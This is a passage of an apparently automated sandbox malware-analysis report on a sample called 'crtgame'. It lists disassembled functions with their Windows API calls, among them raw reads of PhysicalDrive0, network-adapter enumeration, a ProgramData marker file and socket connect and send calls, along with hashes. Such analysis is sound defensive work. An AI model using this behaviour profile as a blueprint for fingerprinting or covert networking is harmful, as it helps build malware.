CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02C2F2CE
DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02C2F30C
GetLastError.KERNEL32 ref: 02C2F36D
CloseHandle.KERNELBASE(?), ref: 02C2F3A4

Strings

\\.\PhysicalDrive0, xrefs: 02C2F2C7

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseControlCreateDeviceErrorFileHandleLast
String ID: \\.\PhysicalDrive0
API String ID: 4026078076-1180397377
Opcode ID: 0f6d32e7d26319931782adc7880a4aa72c2c13d003589e6eed29f699d6d073a1
Instruction ID: 5550f969966aeff37036e22af199534440e6b54f8cf3883b0da8a92b65b27570
Opcode Fuzzy Hash: 0f6d32e7d26319931782adc7880a4aa72c2c13d003589e6eed29f699d6d073a1
Instruction Fuzzy Hash: 6A31E271D0022DABDB24CF95C984BAEBBB9EF84714F20416DE109A3680CB745B08CBD0

Function 02C21CF8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 105
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C21D11
GetLastError.KERNEL32 ref: 02C21D23

Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C21D59
GetLastError.KERNEL32 ref: 02C21D6B
__beginthreadex.LIBCMT ref: 02C21DB1
GetLastError.KERNEL32 ref: 02C21DC6
CloseHandle.KERNEL32(00000000), ref: 02C21DDD
CloseHandle.KERNEL32(00000000), ref: 02C21DEC
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C21E14
CloseHandle.KERNELBASE(00000000), ref: 02C21E1B

Strings

thread.entry_event, xrefs: 02C21D3C
thread.exit_event, xrefs: 02C21D84
thread, xrefs: 02C21DFB

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
String ID: thread$thread.entry_event$thread.exit_event
API String ID: 831262434-3017686385
Opcode ID: e993a84b8694c77433d99b98262513520827647c28ddbe8fe2c5dce7a90d7308
Instruction ID: 98c9c76c22ef06150845cd045fb1fccd50fce18b457910906afe1de4d3f9a741
Opcode Fuzzy Hash: e993a84b8694c77433d99b98262513520827647c28ddbe8fe2c5dce7a90d7308
Instruction Fuzzy Hash: D5319C769003109FD711EF24C848B2BBBE5EB84720F144A2DF8498B291DB719D49CFD2

Function 02C25C4F Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 02C25C5E

Part of subcall function 02C329CC: __FF_MSGBANNER.LIBCMT ref: 02C329E3
Part of subcall function 02C329CC: __NMSG_WRITE.LIBCMT ref: 02C329EA
Part of subcall function 02C329CC: RtlAllocateHeap.NTDLL(00990000,00000000,00000001), ref: 02C32A0F

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000023,00000000,?,?,?,00000000), ref: 02C25C7E
lstrcpyW.KERNEL32(C:\ProgramData\rc.dat,00000000,?,?,?,00000000), ref: 02C25C86
lstrcatW.KERNEL32(C:\ProgramData\rc.dat,\ts.dat,?,?,?,00000000), ref: 02C25C92
CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,80000000,00000000,00000000,00000003,00000020,00000000,?,?,?,00000000), ref: 02C25CAB
ReadFile.KERNEL32(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C25CC0
CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 02C25CC7
__time64.LIBCMT ref: 02C25CDB
CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,40000000,00000000,00000000,00000002,00000022,00000000,?,?,?,00000000), ref: 02C25CF8
WriteFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C25D0D
CloseHandle.KERNELBASE(00000000,?,?,?,00000000), ref: 02C25D14

Strings

C:\ProgramData\rc.dat, xrefs: 02C25C69, 02C25C6E, 02C25C85, 02C25C91, 02C25CA4, 02C25CED
\ts.dat, xrefs: 02C25C8C

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandle$AllocateFolderHeapPathReadSpecialWrite__time64_malloclstrcatlstrcpy
String ID: C:\ProgramData\rc.dat$\ts.dat
API String ID: 49968893-2903805982
Opcode ID: 95ebd7cc75ee97f365b5ffebaf8388d85d8a8104bc32b7fe04c8f0032f4b6e15
Instruction ID: c366fa4306f6e951fde5d4a04866cadc69e4fc9e9c976c7a1f0ead33d92ad3a6
Opcode Fuzzy Hash: 95ebd7cc75ee97f365b5ffebaf8388d85d8a8104bc32b7fe04c8f0032f4b6e15
Instruction Fuzzy Hash: 2E2128769402187FE7106B649C88FAFFBACDB45664F104655F919A31C0DB705D4D8BF0

Function 02C24CB1 Relevance: 16.8, APIs: 11, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 02C24CB6
RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24CE2
RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24CEE

Part of subcall function 02C24B18: __EH_prolog.LIBCMT ref: 02C24B1D
Part of subcall function 02C24B18: InterlockedExchange.KERNEL32(?,00000000), ref: 02C24C1D

RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24DBE
RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24DC4
RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24DCB
RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24DD1
RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24FD2
RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24FD8
RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24FE3
RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24FEC

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
String ID:
API String ID: 2062355503-0
Opcode ID: 5db4d041cf589095f51140a4eb1e51051999f742f3f2290d437e27b524a0a86e
Instruction ID: 01c857fccceef6aecffe26ae11e284201181ee8c32bf912d721342ee7c620c53
Opcode Fuzzy Hash: 5db4d041cf589095f51140a4eb1e51051999f742f3f2290d437e27b524a0a86e
Instruction Fuzzy Hash: A9B14975D0026DDFDF25DFA0C840BEEBBB5AF44314F10419AE80976280DBB56A89CFA5

Function 02C226DB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 02C22706
CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C2272B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C45583), ref: 02C22738

Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717

SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02C22778
RtlLeaveCriticalSection.NTDLL(?), ref: 02C227D9

Strings

timer, xrefs: 02C22745

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
String ID: timer
API String ID: 4293676635-1792073242
Opcode ID: d73cdbb6ae68f5086144ed8d2357082a310a45fe4ab194e433aa706d3499498e
Instruction ID: 52de92e8f5962d8bd1eaf0035d3dbfe732c2b6a9422d41c79c6f8f2787ee27fd
Opcode Fuzzy Hash: d73cdbb6ae68f5086144ed8d2357082a310a45fe4ab194e433aa706d3499498e
Instruction Fuzzy Hash: 59317EB2909755AFD710DF65D944B17BBE8FB48B24F004A2EF85583680DB70E918CF92

Function 02C2F1FA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C2F2AF: CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02C2F2CE
Part of subcall function 02C2F2AF: DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02C2F30C
Part of subcall function 02C2F2AF: GetLastError.KERNEL32 ref: 02C2F36D
Part of subcall function 02C2F2AF: CloseHandle.KERNELBASE(?), ref: 02C2F3A4

Part of subcall function 02C2F3B3: LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02C2F3C9
Part of subcall function 02C2F3B3: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C2F3E2
Part of subcall function 02C2F3B3: GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02C2F407
Part of subcall function 02C2F3B3: FreeLibrary.KERNEL32(00000000), ref: 02C2F490

GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02C2F248
CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02C2F269
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C2F27D
CloseHandle.KERNEL32(00000000), ref: 02C2F286

Strings

tLVh, xrefs: 02C2F250

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleLibrary$AdaptersAddressControlDeviceDirectoryErrorFreeInfoLastLoadProcTimeWindows
String ID: tLVh
API String ID: 1378705229-319918027
Opcode ID: a3bfa404f34c5709ae8378ee101603c7aa1f919e2c9ac0080dcec186dc6f4651
Instruction ID: a0048b1598334a9afe3df39fd65ffeff9b513fa48c48eea6b341237b030d8731
Opcode Fuzzy Hash: a3bfa404f34c5709ae8378ee101603c7aa1f919e2c9ac0080dcec186dc6f4651
Instruction Fuzzy Hash: DE116375D0132C6BDB20DBA5DD48FDEBBBEAB45710F000619E909AB184DB745A4DCBD0

Function 02C229EE Relevance: 7.6, APIs: 5, Instructions: 79
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASetLastError.WS2_32(00000000,?,?,?,00000006,?,?), ref: 02C22A3B
closesocket.WS2_32(?), ref: 02C22A42
ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02C22A89
WSASetLastError.WS2_32(00000000), ref: 02C22A97
closesocket.WS2_32(?), ref: 02C22A9E

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: ErrorLastclosesocket$ioctlsocket
String ID:
API String ID: 1561005644-0
Opcode ID: 6dc3e3a8dbaa23ed405250ccec6ac9d18dcabe8918b6b69c3018de6f26fa618d
Instruction ID: 7e3897fd8f0787480d790a200ed26505447f4da39a80d78dc49308621cd1f792
Opcode Fuzzy Hash: 6dc3e3a8dbaa23ed405250ccec6ac9d18dcabe8918b6b69c3018de6f26fa618d
Instruction Fuzzy Hash: 93212B77940315EBDB34ABB8880476EB7E9DF84315F10496DEC45C3540EF708A48C791

Function 02C21BA7 Relevance: 7.6, APIs: 5, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 02C21BAC
RtlEnterCriticalSection.NTDLL ref: 02C21BBC
RtlLeaveCriticalSection.NTDLL ref: 02C21BEA
RtlEnterCriticalSection.NTDLL ref: 02C21C13
RtlLeaveCriticalSection.NTDLL ref: 02C21C56

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$H_prolog
String ID:
API String ID: 1633115879-0
Opcode ID: 42d1805a73938c1245f7beb0254dae7e717cfff16c335560098031be4891f612
Instruction ID: 7081bddc45159c550bd6ecf217308998edd6e86cdd5f8357a3cc14283b77b125
Opcode Fuzzy Hash: 42d1805a73938c1245f7beb0254dae7e717cfff16c335560098031be4891f612
Instruction Fuzzy Hash: 41218DB9A00614AFCB14CF68C44479ABBB5FF88714F158549EC1997302DBB4EA09CBE0

Function 02C22EDD Relevance: 6.0, APIs: 4, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASetLastError.WS2_32(00000000,?,?,?,?,?,02C2358B,?,?,?,?,?,?,?,02C28FBF,?), ref: 02C22EEE
WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02C22EFD
WSAGetLastError.WS2_32(?,02C2358B,?,?,?,?,?,?,?,02C28FBF,?,?,?,00000001,00000006,?), ref: 02C22F0C
setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02C22F36

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: ErrorLast$Socketsetsockopt
String ID:
API String ID: 2093263913-0
Opcode ID: a90fe87ebc76f38aec3b0ac9cb1989ee31f92df39ee3fe15ec69920e7abd7db1
Instruction ID: b7804b17fd9e88932ec7b6e80114420bc1f6e50faf41552d2daae1338b983cf2
Opcode Fuzzy Hash: a90fe87ebc76f38aec3b0ac9cb1989ee31f92df39ee3fe15ec69920e7abd7db1
Instruction Fuzzy Hash: 67017576940314BBDB309F65DC88B5BBBA9EB85771F008AA9FD088B141D7718904CBA0

Function 02C22DB5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C22D39: WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02C23390,00000001,?,00000000,?,?,?,?,?), ref: 02C22D47
Part of subcall function 02C22D39: WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02C22D5C

WSASetLastError.WS2_32(00000000,00000000,?,?), ref: 02C22E6D
select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02C22E83

Strings

3', xrefs: 02C22E22

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: ErrorLast$Sendselect
String ID: 3'
API String ID: 2958345159-280543908
Opcode ID: a449d1257649d26b60d8175daebbeec29759f9301a20e27ae5da09572f07a8cf
Instruction ID: d84388d0ea7f298e6e23a13eafa4b90f882c166cab461a9a1a8fc58fadf35139
Opcode Fuzzy Hash: a449d1257649d26b60d8175daebbeec29759f9301a20e27ae5da09572f07a8cf
Instruction Fuzzy Hash: 7231E3B6E102299FDF11DF60C8147EEBBEAEF45314F00499AEC4493240EB749959DFA1

Function 02C22AC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASetLastError.WS2_32(00000000,?,?), ref: 02C22AEA
connect.WS2_32(00000010,?,?), ref: 02C22AF5

Strings

3', xrefs: 02C22B3B

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: ErrorLastconnect
String ID: 3'
API String ID: 374722065-280543908
Opcode ID: 2b5181f36c0bdd020190f23ebcb35f4d49dc4566a886144627d5398c4d01f54b
Instruction ID: f47491f00874c602a80da04a8460ea5bf64d873142d6ea4771850b2b8e963556
Opcode Fuzzy Hash: 2b5181f36c0bdd020190f23ebcb35f4d49dc4566a886144627d5398c4d01f54b
Instruction Fuzzy Hash: 5121D772E00218ABCF14EFB4D4147AEBBBAEF84324F00459DDC5993280EF744A099F92

Function 02C2353E Relevance: 4.6, APIs: 3, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 02C23543

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d7d23b330887a194c86a1c742578f2acc4972958eec91788b68ff3a15dd2da81
Instruction ID: ac03c29482bbf24310a911340fca8e972542424cf36142a1f7eac82a88dc3cc9
Opcode Fuzzy Hash: d7d23b330887a194c86a1c742578f2acc4972958eec91788b68ff3a15dd2da81
Instruction Fuzzy Hash: D2515BB190425ADFCB09DF68D4407AABBB5FF08320F10819EE8699B380DB749A14CF91

Function 02C2369A Relevance: 4.6, APIs: 3, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedIncrement.KERNEL32(?), ref: 02C236A7

Part of subcall function 02C22420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C22432
Part of subcall function 02C22420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C22445
Part of subcall function 02C22420: RtlEnterCriticalSection.NTDLL(?), ref: 02C22454
Part of subcall function 02C22420: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22469
Part of subcall function 02C22420: RtlLeaveCriticalSection.NTDLL(?), ref: 02C22470

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
String ID:
API String ID: 1601054111-0
Opcode ID: be4ab8e3f9a00b452baae10fffe343b245c68ae4c3a98e33cdd5cc2f28809230
Instruction ID: c48001732b2c2cef5eb9e3ddcf44335f6511c94da44188212dab1e071f4f9945
Opcode Fuzzy Hash: be4ab8e3f9a00b452baae10fffe343b245c68ae4c3a98e33cdd5cc2f28809230
Instruction Fuzzy Hash: 7011C1B5100258ABDF218E14CC85FAA3BAAFF50750F104556FE528B2D0CF38E968CB94

Function 02C31B10 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON

Download Yara Rule

APIs

__beginthreadex.LIBCMT ref: 02C31B26
CloseHandle.KERNEL32(?,00000000,?,?,?,?,02C2A5F0,00000000), ref: 02C31B57
ResumeThread.KERNELBASE(?,00000000,?,?,?,?,02C2A5F0,00000000), ref: 02C31B65

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseHandleResumeThread__beginthreadex
String ID:
API String ID: 1685284544-0
Opcode ID: d7a3008dafa6b8e1a856657d97963ea05b64986d3789d5dae03f87c1388b4970
Instruction ID: 11c605c890d0cdffb36726399637cf0f8621e93036873f647d77cb70ecb56354
Opcode Fuzzy Hash: d7a3008dafa6b8e1a856657d97963ea05b64986d3789d5dae03f87c1388b4970
Instruction Fuzzy Hash: 0EF0C8702402005FD7209F5CDC80FD173D8AF89728F180A6AF548C7280D3A1E8969A90

Function 02C21AA9 Relevance: 4.5, APIs: 3, Instructions: 18networkCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(02C574A0), ref: 02C21ABA
WSAStartup.WS2_32(00000002,00000000), ref: 02C21ACB
InterlockedExchange.KERNEL32(02C574A4,00000000), ref: 02C21AD7

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: Interlocked$ExchangeIncrementStartup
String ID:
API String ID: 1856147945-0
Opcode ID: d45f1b691eab43e625ef79d5d8cd1a0abbe893a4dbeb019ca2eef7b6e653087e
Instruction ID: a1b102a441f0f125537ec75e2f2985fc14d15d9b82164a2f039079e3e34538ab
Opcode Fuzzy Hash: d45f1b691eab43e625ef79d5d8cd1a0abbe893a4dbeb019ca2eef7b6e653087e
Instruction Fuzzy Hash: E2D02B38D801145BF21066A49C0EB3AF79CD700624F000750FC29C00C0EB50656C85E7

Function 02C24B18 Relevance: 3.1, APIs: 2, Instructions: 137COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C24B1D

Part of subcall function 02C21BA7: __EH_prolog.LIBCMT ref: 02C21BAC
Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21BBC
Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21BEA
Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21C13
Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21C56

Part of subcall function 02C2DA97: __EH_prolog.LIBCMT ref: 02C2DA9C
Part of subcall function 02C2DA97: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C2DB1B

InterlockedExchange.KERNEL32(?,00000000), ref: 02C24C1D

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
String ID:
API String ID: 1927618982-0
Opcode ID: deb79ec463c27fabd3ff090995f525688e5d211fef671b95d72c82c7a0c4b342
Instruction ID: 6f88158442ab92f5f8e99073a3f94c9b162be294be90da7c45d8804a03b76d3c
Opcode Fuzzy Hash: deb79ec463c27fabd3ff090995f525688e5d211fef671b95d72c82c7a0c4b342
Instruction Fuzzy Hash: 93513BB1D04258DFDB15DFA8C484AEEFFB5AF48314F14816AE906AB351DB309A08CF60

Function 02C22D39 Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02C23390,00000001,?,00000000,?,?,?,?,?), ref: 02C22D47
WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02C22D5C

Part of subcall function 02C29EA8: WSAGetLastError.WS2_32(?,00000080,00000017,02C23114), ref: 02C29EB6

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: ErrorLast$Send
String ID:
API String ID: 1282938840-0
Opcode ID: bfc32409c5c4e7b34c49534200ce394b56c404449ddb9306b4e35e9164c13d57
Instruction ID: 8fd4b11fa309e4efb42e7ffa72635523c7294beab25bcda9ec9a127fccc26fb6
Opcode Fuzzy Hash: bfc32409c5c4e7b34c49534200ce394b56c404449ddb9306b4e35e9164c13d57
Instruction Fuzzy Hash: B8017977500215EFD7205F55984456BB6EDFF45750B10096EF89983200EB709D05DBA1

Function 02C27D89 Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000,00000000,?,02C27545,?,02C57454,02C57454,?,?,02C57454,00000000,000007E7), ref: 02C27DA6
shutdown.WS2_32(00000000,00000002), ref: 02C27DAF

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: ErrorLastshutdown
String ID:
API String ID: 1920494066-0
Opcode ID: 2d07c065c805c85800675b688ffca8dba3415f5f5164d9089073cd6028c14f9a
Instruction ID: 21c15d28525fadcc0db87008fe98a7176be06cceee14c25141626d0de0c47a82
Opcode Fuzzy Hash: 2d07c065c805c85800675b688ffca8dba3415f5f5164d9089073cd6028c14f9a
Instruction Fuzzy Hash: FBF06777A003258FC720AF68D514B6AB7E5EF48320F10499CED9597380DB30AC14CBA1

Function 02C25D72 Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C25D0D
CloseHandle.KERNELBASE(00000000,?,?,?,00000000), ref: 02C25D14

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseFileHandleWrite
String ID:
API String ID: 1769507746-0
Opcode ID: 437637194fa2e582649cf81925fd403188a4c40b58122b0cd93b61c2eba63175
Instruction ID: 6392d44ff3472965098521152aadbf7808ff4732d748a308343693babdaa22c0
Opcode Fuzzy Hash: 437637194fa2e582649cf81925fd403188a4c40b58122b0cd93b61c2eba63175
Instruction Fuzzy Hash: 0AE0D839A415249B8B159F65E1880DFFB75FF86231BC401CAD50947214CB39556D87C5

Function 02C25044 Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C25049

Part of subcall function 02C23D7E: htons.WS2_32(?), ref: 02C23DA2
Part of subcall function 02C23D7E: htonl.WS2_32(00000000), ref: 02C23DB9
Part of subcall function 02C23D7E: htonl.WS2_32(00000000), ref: 02C23DC0

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: htonl$H_prologhtons
String ID:
API String ID: 4039807196-0
Opcode ID: 3240c32edf8a03ec101bf779cbf5ec9b52b987c43105635d146d280aa3649c55
Instruction ID: 918b553b05a1f921cbcc5132c0690eb298a366570b96cb17d3d49489008f40e4
Opcode Fuzzy Hash: 3240c32edf8a03ec101bf779cbf5ec9b52b987c43105635d146d280aa3649c55
Instruction Fuzzy Hash: E2814C75D0025EDECF09DFA8D5806EEBBB5EF48310F14815AD815B7280EB365A49CFA4

Function 02C2E360 Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C2E365

Part of subcall function 02C21A01: TlsGetValue.KERNEL32 ref: 02C21A0A

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prologValue
String ID:
API String ID: 3700342317-0
Opcode ID: e1a7dcf352f144ecd66f7b1e3c63608e4c658d69f797218c36bde29c30edfd3e
Instruction ID: d1cb4ad96f2cf25d295f87a0ab160bcf012e5deaf0487a560e1a15830cce1579
Opcode Fuzzy Hash: e1a7dcf352f144ecd66f7b1e3c63608e4c658d69f797218c36bde29c30edfd3e
Instruction Fuzzy Hash: 122133B2904219AFDB04DF95D540AEFBBF9FF48311F14411EE908E7240DB71A904DBA1

Function 02C233B2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02C233CC

Part of subcall function 02C232AB: __EH_prolog.LIBCMT ref: 02C232B0
Part of subcall function 02C232AB: RtlEnterCriticalSection.NTDLL(?), ref: 02C232C3
Part of subcall function 02C232AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02C232EF

Memory Dump Source

